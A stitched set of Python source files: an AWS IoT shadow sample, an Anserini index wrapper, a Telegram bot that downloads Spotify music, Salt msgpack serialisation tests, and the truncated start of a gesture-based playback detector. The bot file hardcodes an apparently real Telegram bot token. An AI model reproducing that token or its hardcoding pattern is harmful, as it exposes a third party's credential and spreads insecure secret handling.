mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=False,
keep_alive_secs=6)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=False,
keep_alive_secs=6,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
    # mqtt_connection before it's fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
        # Note that it **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Delta events...")
delta_subscribed_future, _ = shadow_client.subscribe_to_shadow_delta_updated_events(
request=iotshadow.ShadowDeltaUpdatedSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_shadow_delta_updated)
# Wait for subscription to succeed
delta_subscribed_future.result()
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
get_accepted_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_accepted(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_accepted)
get_rejected_subscribed_future, _ = shadow_client.subscribe_to_get_shadow_rejected(
request=iotshadow.GetShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_get_shadow_rejected)
# Wait for subscriptions to succeed
get_accepted_subscribed_future.result()
get_rejected_subscribed_future.result()
        # The rest of the sample runs asynchronously.
        # Issue request for shadow's current state.
        # The response will be received by the on_get_shadow_accepted() callback
print("Requesting current shadow state...")
publish_get_future = shadow_client.publish_get_shadow(
request=iotshadow.GetShadowRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE)
# Ensure that publish succeeds
publish_get_future.result()
# Launch thread to handle user input.
# A "daemon" thread won't prevent the program from shutting down.
print("Launching thread to read user input...")
user_input_thread = threading.Thread(target=user_input_thread_fn, name='user_input_thread')
user_input_thread.daemon = True
user_input_thread.start()
except Exception as e:
exit(e)
# Wait for the sample to finish (user types 'quit', or an error occurs)
is_sample_done.wait()
|
multifield_anserini.py
|
import os
import math
import json
import tempfile
import itertools
import time
import re
import shutil
import threading
import contextlib
from multiprocessing.pool import ThreadPool
from functools import lru_cache
from pytools import memoize_method
import onir
from onir import indices
from onir.interfaces import trec
from onir.interfaces.java import J
logger = onir.log.easy()
J.register(jars=["bin/lucene-backward-codecs-8.0.0.jar", "bin/anserini-0.8.0-fatjar.jar"], defs=dict(
# [L]ucene
L_FSDirectory='org.apache.lucene.store.FSDirectory',
L_DirectoryReader='org.apache.lucene.index.DirectoryReader',
L_Term='org.apache.lucene.index.Term',
L_IndexSearcher='org.apache.lucene.search.IndexSearcher',
L_BM25Similarity='org.apache.lucene.search.similarities.BM25Similarity',
L_ClassicSimilarity='org.apache.lucene.search.similarities.ClassicSimilarity',
L_LMDirichletSimilarity='org.apache.lucene.search.similarities.LMDirichletSimilarity',
L_QueryParser='org.apache.lucene.queryparser.flexible.standard.StandardQueryParser',
L_QueryParserUtil='org.apache.lucene.queryparser.flexible.standard.QueryParserUtil',
L_StandardAnalyzer='org.apache.lucene.analysis.standard.StandardAnalyzer',
L_EnglishAnalyzer='org.apache.lucene.analysis.en.EnglishAnalyzer',
L_CharArraySet='org.apache.lucene.analysis.CharArraySet',
L_MultiFields='org.apache.lucene.index.MultiFields',
# [A]nserini
A_IndexCollection='io.anserini.index.IndexCollection',
A_IndexArgs='io.anserini.index.IndexArgs',
A_IndexUtils='io.anserini.index.IndexUtils',
A_LuceneDocumentGenerator='io.anserini.index.generator.LuceneDocumentGenerator',
A_SearchCollection='io.anserini.search.SearchCollection',
A_SearchArgs='io.anserini.search.SearchArgs',
A_DefaultEnglishAnalyzer='io.anserini.analysis.DefaultEnglishAnalyzer',
A_AnalyzerUtils='io.anserini.analysis.AnalyzerUtils',
# [M]isc
M_CmdLineParser='org.kohsuke.args4j.CmdLineParser',
))
def _surpress_log(java_class, levels=('DEBUG', 'INFO')):
re_levels = r'|'.join([re.escape(l) for l in levels])
re_java_class = re.escape(java_class)
regex = rf'({re_levels}) {re_java_class}'
def wrapped(log_line):
return re.search(regex, log_line) is None
return wrapped
def pbar_bq_listener(pbar):
def wrapped(log_line):
match = re.search(r'INFO io.anserini.search.SearchCollection \[pool-.*-thread-.*\] ([0-9]+) queries processed', log_line)
if match:
count = int(match.group(1))
pbar.update(count - pbar.n)
return False
return wrapped
class MultifieldAnseriniIndex(indices.BaseIndex):
"""
Interface to an Anserini index.
"""
def __init__(self, path, keep_stops=False, stemmer='porter', primary_field='text', lang='en'):
self._base_path = path
os.makedirs(path, exist_ok=True)
self._path = f'{path}-{primary_field}'
if not os.path.exists(self._path):
os.symlink(self._base_path.split('/')[-1], self._path, target_is_directory=True)
self._primary_field = primary_field
self._settings_path = os.path.join(path, 'settings.json')
if os.path.exists(self._settings_path):
self._load_settings()
assert self._settings['keep_stops'] == keep_stops
assert self._settings['stemmer'] == stemmer
assert self._settings['lang'] == lang
else:
self._settings = {
'keep_stops': keep_stops,
'stemmer': stemmer,
'lang': lang,
'built': False
}
self._dump_settings()
def _dump_settings(self):
with open(self._settings_path, 'wt') as f:
json.dump(self._settings, f)
def _load_settings(self):
with open(self._settings_path, 'rt') as f:
self._settings = json.load(f)
if 'lang' not in self._settings:
self._settings['lang'] = 'en'
def built(self):
self._load_settings()
return self._settings['built']
def num_docs(self):
return self._reader().numDocs()
def docids(self):
index_utils = self._get_index_utils()
for i in range(self.num_docs()):
yield index_utils.convertLuceneDocidToDocid(i)
def get_raw(self, did):
return self._get_index_utils().getRawDocument(did)
def path(self):
return self._path
@memoize_method
def _reader(self):
return J.L_DirectoryReader.open(J.L_FSDirectory.open(J.File(self._path).toPath()))
@memoize_method
def _searcher(self):
return J.L_IndexSearcher(self._reader().getContext())
@memoize_method
def term2idf(self, term):
#term = J.A_AnalyzerUtils.tokenize(self._get_stemmed_analyzer(), term).toArray()
term = J.A_AnalyzerUtils.analyze(self._get_analyzer(), term).toArray()
if term:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
@memoize_method
def term2idf_unstemmed(self, term):
#term = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), term).toArray()
term = J.A_AnalyzerUtils.analyze(self._get_analyzer(), term).toArray()
if len(term) == 1:
df = self._reader().docFreq(J.L_Term(self._primary_field, term[0]))
doc_count = self.collection_stats().docCount()
return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))
return 0. # stop word; very common
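    # A minimal sketch of the idf weighting computed by the two methods above,
    # with the Lucene calls stripped away (illustrative; not used elsewhere):
    @staticmethod
    def _idf_sketch(df, doc_count):
        # Lucene-style BM25 idf; the +1 inside the log keeps the weight positive.
        return math.log(1 + (doc_count - df + 0.5) / (df + 0.5))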
def doc_freq(self, term):
return self._reader().docFreq(J.L_Term(self._primary_field, term))
@memoize_method
def collection_stats(self):
return self._searcher().collectionStatistics(self._primary_field)
def document_vector(self, did):
result = {}
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
vec = self._reader().getTermVector(ldid, self._primary_field)
it = vec.iterator()
while it.next():
result[it.term().utf8ToString()] = it.totalTermFreq()
return result
def avg_dl(self):
cs = self.collection_stats()
return cs.sumTotalTermFreq() / cs.docCount()
@memoize_method
def _get_index_utils(self):
return J.A_IndexUtils(self._path)
@lru_cache(maxsize=16)
def get_doc(self, did):
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return ["a"] # hack -- missing doc
return self._get_index_utils().getTransformedDocument(did) or ["a"]
@memoize_method
def _get_analyzer(self):
return J.L_StandardAnalyzer(J.L_CharArraySet(0, False))
@memoize_method
def _get_stemmed_analyzer(self):
#return J.A_DefaultEnglishAnalyzer(self._settings['stemmer'], J.L_CharArraySet(0, False))
return J.A_DefaultEnglishAnalyzer.newStemmingInstance(self._settings['stemmer'], J.L_CharArraySet(0, False))
def tokenize(self, text):
#result = J.A_AnalyzerUtils.tokenize(self._get_analyzer(), text).toArray()
result = J.A_AnalyzerUtils.analyze(self._get_analyzer(), text).toArray()
# mostly good, just gonna split off contractions
result = list(itertools.chain(*(x.split("'") for x in result)))
return result
def iter_terms(self):
it_leaves = self._reader().leaves().iterator()
while it_leaves.hasNext():
it_terms = it_leaves.next().reader().terms(self._primary_field).iterator()
while it_terms.next():
yield {
'term': it_terms.term().utf8ToString(),
'df': it_terms.docFreq(),
'cf': it_terms.totalTermFreq(),
}
@memoize_method
def _model(self, model):
if model == 'randomqrels':
return self._model('bm25_k1-0.6_b-0.5')
if model.startswith('bm25'):
k1, b = 0.9, 0.4
Model = J.L_BM25Similarity
for arg in model.split('_')[1:]:
if '-' in arg:
k, v = arg.split('-')
else:
k, v = arg, None
if k == 'k1':
k1 = float(v)
elif k == 'b':
b = float(v)
elif k == 'noidf':
Model = J.A_BM25SimilarityNoIdf
else:
raise ValueError(f'unknown bm25 parameter {k}={v}')
return Model(k1, b)
elif model == 'vsm':
return J.L_ClassicSimilarity()
elif model == 'ql':
mu = 1000.
for k, v in [arg.split('-') for arg in model.split('_')[1:]]:
if k == 'mu':
mu = float(v)
else:
raise ValueError(f'unknown ql parameter {k}={v}')
return J.L_LMDirichletSimilarity(mu)
raise ValueError(f'unknown model {model}')
@memoize_method
def get_query_doc_scores(self, query, did, model, skip_invividual=False):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldid = self._get_index_utils().convertDocidToLuceneDocid(did)
if ldid == -1:
return -999. * len(query), [-999.] * len(query)
analyzer = self._get_stemmed_analyzer()
#query = list(itertools.chain(*[J.A_AnalyzerUtils.tokenize(analyzer, t).toArray() for t in query]))
query = list(itertools.chain(*[J.A_AnalyzerUtils.analyze(analyzer, t).toArray() for t in query]))
if not skip_invividual:
result = []
for q in query:
q = _anserini_escape(q, J)
lquery = J.L_QueryParser().parse(q, self._primary_field)
explain = self._searcher().explain(lquery, ldid)
result.append(explain.getValue().doubleValue())
return sum(result), result
lquery = J.L_QueryParser().parse(_anserini_escape(' '.join(query), J), self._primary_field)
explain = self._searcher().explain(lquery, ldid)
return explain.getValue()
def get_query_doc_scores_batch(self, query, dids, model):
sim = self._model(model)
self._searcher().setSimilarity(sim)
ldids = {self._get_index_utils().convertDocidToLuceneDocid(did): did for did in dids}
analyzer = self._get_stemmed_analyzer()
#query = J.A_AnalyzerUtils.tokenize(analyzer, query).toArray()
query = J.A_AnalyzerUtils.analyze(analyzer, query).toArray()
query = ' '.join(_anserini_escape(q, J) for q in query)
docs = ' '.join(f'{J.A_LuceneDocumentGenerator.FIELD_ID}:{did}' for did in dids)
lquery = J.L_QueryParser().parse(f'({query}) AND ({docs})', self._primary_field)
result = {}
search_results = self._searcher().search(lquery, len(dids))
for top_doc in search_results.scoreDocs:
result[ldids[top_doc.doc]] = top_doc.score
del search_results
return result
def build(self, doc_iter, replace=False, optimize=True, store_term_weights=False):
with logger.duration(f'building {self._base_path}'):
thread_count = onir.util.safe_thread_count()
with tempfile.TemporaryDirectory() as d:
if self._settings['built']:
if replace:
logger.warn(f'removing index: {self._base_path}')
shutil.rmtree(self._base_path)
else:
logger.warn(f'adding to existing index: {self._base_path}')
fifos = []
for t in range(thread_count):
fifo = os.path.join(d, f'{t}.json')
os.mkfifo(fifo)
fifos.append(fifo)
index_args = J.A_IndexArgs()
index_args.collectionClass = 'JsonCollection'
index_args.generatorClass = 'LuceneDocumentGenerator'
index_args.threads = thread_count
index_args.input = d
index_args.index = self._base_path
index_args.storePositions = True
index_args.storeDocvectors = True
index_args.storeTermWeights = store_term_weights
index_args.keepStopwords = self._settings['keep_stops']
index_args.stemmer = self._settings['stemmer']
index_args.optimize = optimize
indexer = J.A_IndexCollection(index_args)
thread = threading.Thread(target=indexer.run)
thread.start()
time.sleep(1) # give it some time to start up, otherwise fails due to race condition
for i, doc in enumerate(doc_iter):
f = fifos[hash(i) % thread_count]
if isinstance(f, str):
f = open(f, 'wt')
fifos[hash(i) % thread_count] = f
data = {'id': doc.did, 'contents': 'a'}
data.update(doc.data)
json.dump(data, f)
f.write('\n')
for f in fifos:
if not isinstance(f, str):
f.close()
else:
with open(f, 'wt'):
pass # open and close to indicate file is done
logger.debug('waiting to join')
thread.join()
self._settings['built'] = True
self._dump_settings()
def query(self, query, model, topk, destf=None, quiet=False):
return self.batch_query([('0', query)], model, topk, destf=destf, quiet=quiet)['0']
def batch_query(self, queries, model, topk, destf=None, quiet=False):
THREADS = onir.util.safe_thread_count()
query_file_splits = 1000
if hasattr(queries, '__len__'):
if len(queries) < THREADS:
THREADS = len(queries)
query_file_splits = 1
elif len(queries) < THREADS * 10:
query_file_splits = ((len(queries)+1) // THREADS)
elif len(queries) < THREADS * 100:
query_file_splits = ((len(queries)+1) // (THREADS * 10))
else:
query_file_splits = ((len(queries)+1) // (THREADS * 100))
with tempfile.TemporaryDirectory() as topic_d, tempfile.TemporaryDirectory() as run_d:
run_f = os.path.join(run_d, 'run')
topic_files = []
file_topic_counts = []
current_file = None
total_topics = 0
for i, (qid, text) in enumerate(queries):
topic_file = '{}/{}.queries'.format(topic_d, i // query_file_splits)
if current_file is None or current_file.name != topic_file:
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
current_file = open(topic_file, 'wt')
file_topic_counts.append(0)
current_file.write(f'{qid}\t{text}\n')
file_topic_counts[-1] += 1
total_topics += 1
if current_file is not None:
topic_files.append(current_file.name)
current_file.close()
J.initialize()
with ThreadPool(THREADS) as pool, \
logger.pbar_raw(desc=f'batch_query ({model})', total=total_topics) as pbar:
def fn(inputs):
file, count = inputs
args = J.A_SearchArgs()
parser = J.M_CmdLineParser(args)
arg_args = [
'-index', self._path,
'-topics', file,
'-output', file + '.run',
'-topicreader', 'TsvString',
'-hits', str(topk),
'-stemmer', self._settings['stemmer'],
'-indexfield', self._primary_field,
]
arg_args += self._model2args(model)
parser.parseArgument(*arg_args)
searcher = J.A_SearchCollection(args)
searcher.runTopics()
searcher.close()
return file + '.run', count
if destf:
result = open(destf + '.tmp', 'wb')
else:
result = {}
for resultf, count in pool.imap_unordered(fn, zip(topic_files, file_topic_counts)):
if destf:
with open(resultf, 'rb') as f:
for line in f:
result.write(line)
else:
run = trec.read_run_dict(resultf)
result.update(run)
pbar.update(count)
if destf:
result.close()
shutil.move(destf + '.tmp', destf)
else:
return result
def _model2args(self, model):
arg_args = []
if model.startswith('bm25'):
arg_args.append('-bm25')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'k1':
arg_args.append('-bm25.k1')
arg_args.append(v)
elif k == 'b':
arg_args.append('-bm25.b')
arg_args.append(v)
elif k == 'rm3':
arg_args.append('-rm3')
elif k == 'rm3.fbTerms':
arg_args.append('-rm3.fbTerms')
arg_args.append(v)
elif k == 'rm3.fbDocs':
arg_args.append('-rm3.fbDocs')
arg_args.append(v)
elif k == 'sdm':
arg_args.append('-sdm')
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown bm25 parameter {arg}')
elif model.startswith('ql'):
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
else:
raise ValueError(f'unknown ql parameter {arg}')
elif model.startswith('sdm'):
arg_args.append('-sdm')
arg_args.append('-qld')
model_args = [arg.split('-', 1) for arg in model.split('_')[1:]]
for arg in model_args:
if len(arg) == 1:
k, v = arg[0], None
elif len(arg) == 2:
k, v = arg
if k == 'mu':
arg_args.append('-mu')
arg_args.append(v)
elif k == 'tw':
arg_args.append('-sdm.tw')
arg_args.append(v)
elif k == 'ow':
arg_args.append('-sdm.ow')
arg_args.append(v)
elif k == 'uw':
arg_args.append('-sdm.uw')
arg_args.append(v)
else:
raise ValueError(f'unknown sdm parameter {arg}')
else:
raise ValueError(f'unknown model {model}')
return arg_args
def _anserini_escape(text, J):
text = J.L_QueryParserUtil.escape(text)
text = text.replace('<', '\\<')
text = text.replace('>', '\\>')
text = text.replace('=', '\\=')
return text
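# Illustrative sketch (not part of the original module): _model2args() parses model
# strings of the form '<ranker>[_<param>-<value>...]' into Anserini CLI arguments,
# for example:
#   'bm25'               -> ['-bm25']
#   'bm25_k1-0.9_b-0.4'  -> ['-bm25', '-bm25.k1', '0.9', '-bm25.b', '0.4']
#   'ql_mu-1000'         -> ['-qld', '-mu', '1000']
#   'sdm_uw-0.1'         -> ['-sdm', '-qld', '-sdm.uw', '0.1']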
|
main.py
|
from spotify import DOWNLOADMP3 as SONGDOWNLOADER
import telepot
import spotify
import requests
import threading
token = '1898871071:AAGQ1zoSHAZPVgzWIznZelLoHedC5inbUgI'
bot = telepot.Bot(token)
sort = {}
def txtfinder(txt):
a = txt.find("https://open.spotify.com")
txt = txt[a:]
return txt
def cantfind(chat_id):
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIBE2BLNclvKLFHC-grzNdOEXKGl6cLAALzAAMSp2oDSBk1Yo7wCGUeBA')
bot.sendMessage(chat_id, "can't find it")
def cantfindone(chat_id):
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIFSWBF_m3GHUtZJxQzobvD_iWxYVClAAJuAgACh4hSOhXuVi2-7-xQHgQ')
bot.sendMessage(chat_id, "can't download one of them")
def downloader(link,chat_id,type):
PLAYLIST = False
if type=='AL':
ITEMS = spotify.album(link)
elif type == 'AR':
ITEMS = spotify.artist(link)
elif type == 'PL':
ITEMS = spotify.playlist(link)
PLAYLIST = True
else:
ITEMS = []
MESSAGE = ""
for song in ITEMS:
if PLAYLIST:
song = song['track']
MESSAGE += song['name'] + " :\n " + song['external_urls']['spotify'] + '\n\n'
bot.sendMessage(chat_id, MESSAGE)
for song in ITEMS:
if PLAYLIST:
song = song['track']
try:
SONGDOWNLOADER(song['href'], chat_id)
except:
cantfindone(chat_id)
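# START() dispatches on the Spotify URL extracted by txtfinder(): /album, /artist
# and /playlist links are expanded into individual tracks via downloader(), single
# /track links go straight to SONGDOWNLOADER(), and the plain /start, /album,
# /single and /artist commands switch the per-chat search mode stored in `sort`.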
def START(msg,chat_id):
print(f"{chat_id}:{msg}")
msglink = txtfinder(msg)
    if msglink[:30] == 'https://open.spotify.com/album':
        downloader(msglink, chat_id, 'AL')
    elif msglink[:30] == 'https://open.spotify.com/track':
        try:
            SONGDOWNLOADER(msglink, chat_id)
except:
bot.sendSticker(chat_id,
'CAACAgQAAxkBAAIFSWBF_m3GHUtZJxQzobvD_iWxYVClAAJuAgACh4hSOhXuVi2-7-xQHgQ')
bot.sendMessage(chat_id, "can't download music")
    elif msglink[:33] == 'https://open.spotify.com/playlist':
        downloader(msglink, chat_id, 'PL')
    elif msglink[:31] == 'https://open.spotify.com/artist':
        downloader(msglink, chat_id, 'AR')
elif msg == "/start":
bot.sendMessage(chat_id,
"Hi \nsend me spotify link and I'll give you music\nor use /single or /album or "
"/artist")
elif msg == "/album":
sort[chat_id]='album'
bot.sendMessage(chat_id, 'send name and name of artist like this: \nName album\nor for better search use this:\nName album - Name artist')
elif msg == '/single':
sort[chat_id]='single'
bot.sendMessage(chat_id,'send name and name of artist like this: \nName song\nor for better search use this:\nName song - Name artist')
elif msg == '/artist':
sort[chat_id]='artist'
bot.sendMessage(chat_id,'send name and name of artist like this: \nName artist')
else:
try:
if sort[chat_id]=='artist':
try:
downloader(spotify.searchartist(msg),chat_id,'AR')
del sort[chat_id]
except:
cantfind(chat_id)
elif sort[chat_id]=='album':
try:
downloader(spotify.searchalbum(msg),chat_id,'AL')
del sort[chat_id]
except:
cantfind(chat_id)
elif sort[chat_id]=='single':
try:
SONGDOWNLOADER(spotify.searchsingle(msg), chat_id)
del sort[chat_id]
except:
cantfind(chat_id)
except:
bot.sendSticker(chat_id, 'CAACAgQAAxkBAAIBFGBLNcpfFcTLxnn5lR20ZbE2EJbrAAJRAQACEqdqA2XZDc7OSUrIHgQ')
bot.sendMessage(chat_id,'send me link or use /single or /album or /artist')
print('Listening ...')
tokenurl = f'https://api.telegram.org/bot{token}'
Update = tokenurl+"/getUpdates"
def UPDATE():
MESSAGES = requests.get(Update).json()
return MESSAGES['result']
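# Note on the polling loop below: Telegram's getUpdates returns {'ok': ..., 'result': [...]},
# and calling getUpdates again with ?offset=<update_id + 1> acknowledges earlier updates
# so they are not redelivered; that is what the per-message requests.post() call does.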
while 1:
if threading.activeCount()-1 < 15:
try:
for message in UPDATE():
offset = message['update_id']+1
offset = Update+f"?offset={offset}"
offset = requests.post(offset)
msg = message['message']['text']
chat_id = message['message']['from']['id']
thread = threading.Thread(target=START,args=(msg,chat_id))
thread.start()
except:
pass
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
import datetime
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import NO_MOCK, NO_MOCK_REASON
# Import Salt libs
from salt.utils import immutabletypes
from salt.utils.odict import OrderedDict
import salt.exceptions
import salt.payload
# Import 3rd-party libs
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
payload = salt.payload.Serial('msgpack')
idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
def test_datetime_dump_load(self):
'''
Check the custom datetime handler can understand itself
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: dtvalue}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
self.assertEqual(
sdata,
b'\x81\xc7\x18N20010203T04:05:06.000007\xc7\x18N20010203T04:05:06.000007')
self.assertEqual(idata, odata)
def test_verylong_dump_load(self):
'''
Test verylong encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'jid': 20180227140750302662}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
idata['jid'] = '{0}'.format(idata['jid'])
self.assertEqual(idata, odata)
def test_immutable_dict_dump_load(self):
'''
Test immutable dict encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'dict': {'key': 'value'}}
sdata = payload.dumps({'dict': immutabletypes.ImmutableDict(idata['dict'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_list_dump_load(self):
'''
Test immutable list encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'list': [1, 2, 3]}
sdata = payload.dumps({'list': immutabletypes.ImmutableList(idata['list'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_set_dump_load(self):
'''
Test immutable set encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'set': ['red', 'green', 'blue']}
sdata = payload.dumps({'set': immutabletypes.ImmutableSet(idata['set'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_odict_dump_load(self):
'''
        Test that odict just works. It wasn't supported until msgpack 0.2.0
'''
payload = salt.payload.Serial('msgpack')
data = OrderedDict()
data['a'] = 'b'
data['y'] = 'z'
data['j'] = 'k'
data['w'] = 'x'
sdata = payload.dumps({'set': data})
odata = payload.loads(sdata)
self.assertEqual({'set': dict(data)}, odata)
def test_mixed_dump_load(self):
'''
Test we can handle all exceptions at once
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
od = OrderedDict()
od['a'] = 'b'
od['y'] = 'z'
od['j'] = 'k'
od['w'] = 'x'
idata = {dtvalue: dtvalue, # datetime
'jid': 20180227140750302662, # long int
'dict': immutabletypes.ImmutableDict({'key': 'value'}), # immutable dict
'list': immutabletypes.ImmutableList([1, 2, 3]), # immutable list
'set': immutabletypes.ImmutableSet(('red', 'green', 'blue')), # immutable set
'odict': od, # odict
}
edata = {dtvalue: dtvalue, # datetime, == input
'jid': '20180227140750302662', # string repr of long int
'dict': {'key': 'value'}, # builtin dict
'list': [1, 2, 3], # builtin list
'set': ['red', 'green', 'blue'], # builtin set
'odict': dict(od), # builtin dict
}
sdata = payload.dumps(idata)
odata = payload.loads(sdata)
self.assertEqual(edata, odata)
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Class to set up zmq echo socket
'''
def echo_server():
'''
            A server that echoes the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
        Test creation, send/recv
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
        # subtle bug in zmq wherein a timeout=0 actually executes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
        # test a regular send afterwards (to make sure sockets aren't in a twist)
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
|
PlaybackDetector.py
|
import time
import tkinter as tk
import HandTrackModule
import math
import Player
import cv2
import numpy as np
import threading
import os
class PlaybackDetector():
def __init__(self,mode=False,maxHands=1,detectionCon=0.5,trackCon=0.5):
self.handDetector=HandTrackModule.handDetector(mode,maxHands,detectionCon,trackCon)
self.fingertipindex=[4,8,12,16,20]
self.timeMode={}
self.mode="Pause"
self.volmmode=False
self.changeTrackMode=False
self.changeTrackFlag=False
        # Initialize Player: Thread1
